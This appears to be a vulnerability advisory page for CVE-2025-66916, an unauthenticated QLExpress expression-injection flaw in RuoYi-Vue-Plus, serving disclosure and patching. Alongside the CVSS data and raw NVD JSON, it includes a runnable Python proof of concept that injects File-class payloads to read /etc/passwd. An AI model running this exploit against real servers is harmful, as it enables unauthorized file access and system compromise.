Security Vulnerability Report
CVE-2025-66916 CVSS 9.4 CRITICAL

Published: 2026-01-08 20:15:45
Last Modified: 2026-01-30 01:05:34

Description

In the snailjob component of RuoYi-Vue-Plus versions 5.5.1 and earlier, the interface /snail-job/workflow/check-node-expression executes QLExpress expressions without filtering user input, allowing attackers to use the File class to perform arbitrary file reading and writing.

CVSS Details

CVSS Score: 9.4
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L

Configurations (Affected Products)

cpe:2.3:a:dromara:ruoyi-vue-plus:*:*:*:*:*:*:*:* - VULNERABLE
RuoYi-Vue-Plus < 5.5.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import json

# CVE-2025-66916 PoC - RuoYi-Vue-Plus QLExpress Expression Injection
# Target: /snail-job/workflow/check-node-expression

TARGET_URL = "http://target.com/snail-job/workflow/check-node-expression"

# Read arbitrary file
PAYLOAD_READ = """
new java.io.FileInputStream("/etc/passwd").readAllBytes()
"""

# Check file existence
PAYLOAD_CHECK = """
new java.io.File("/etc/hosts").exists()
"""


def exploit(target_url, payload):
    headers = {
        "Content-Type": "application/json",
        "User-Agent": "Mozilla/5.0"
    }
    data = {
        "expression": payload.strip()
    }
    try:
        response = requests.post(target_url, json=data, headers=headers, timeout=10)
        print(f"[+] Status Code: {response.status_code}")
        print(f"[+] Response: {response.text}")
        return response.json()
    except Exception as e:
        print(f"[-] Error: {str(e)}")
        return None


if __name__ == "__main__":
    print("[*] CVE-2025-66916 QLExpress Expression Injection PoC")
    print("[*] Target: " + TARGET_URL)
    print("\n[>] Testing file existence check...")
    exploit(TARGET_URL, PAYLOAD_CHECK)
    print("\n[>] Testing arbitrary file read...")
    exploit(TARGET_URL, PAYLOAD_READ)

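References

https://gist.github.com/Catherines77/e3f06b9c4cc6298579e858088a243c3d (Third Party Advisory)
https://gitee.com/dromara/RuoYi-Vue-Plus (Product)
https://github.com/Catherines77/code-au/blob/main/ruoyi-vue-plus/QLExpress.md (Exploit, Third Party Advisory)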

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66916", "sourceIdentifier": "[email protected]", "published": "2026-01-08T20:15:44.657", "lastModified": "2026-01-30T01:05:34.193", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The snailjob component in RuoYi-Vue-Plus versions 5.5.1 and earlier, interface /snail-job/workflow/check-node-expression can execute QLExpress expressions, but it does not filter user input, allowing attackers to use the File class to perform arbitrary file reading and writing."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L", "baseScore": 9.4, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 5.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:dromara:ruoyi-vue-plus:*:*:*:*:*:*:*:*", "versionEndIncluding": "5.5.1", "matchCriteriaId": "E7726AD6-68C7-4949-BBAC-725F3D2ECAC1"}]}]}], "references": [{"url": "https://gist.github.com/Catherines77/e3f06b9c4cc6298579e858088a243c3d", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://gitee.com/dromara/RuoYi-Vue-Plus", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/Catherines77/code-au/blob/main/ruoyi-vue-plus/QLExpress.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}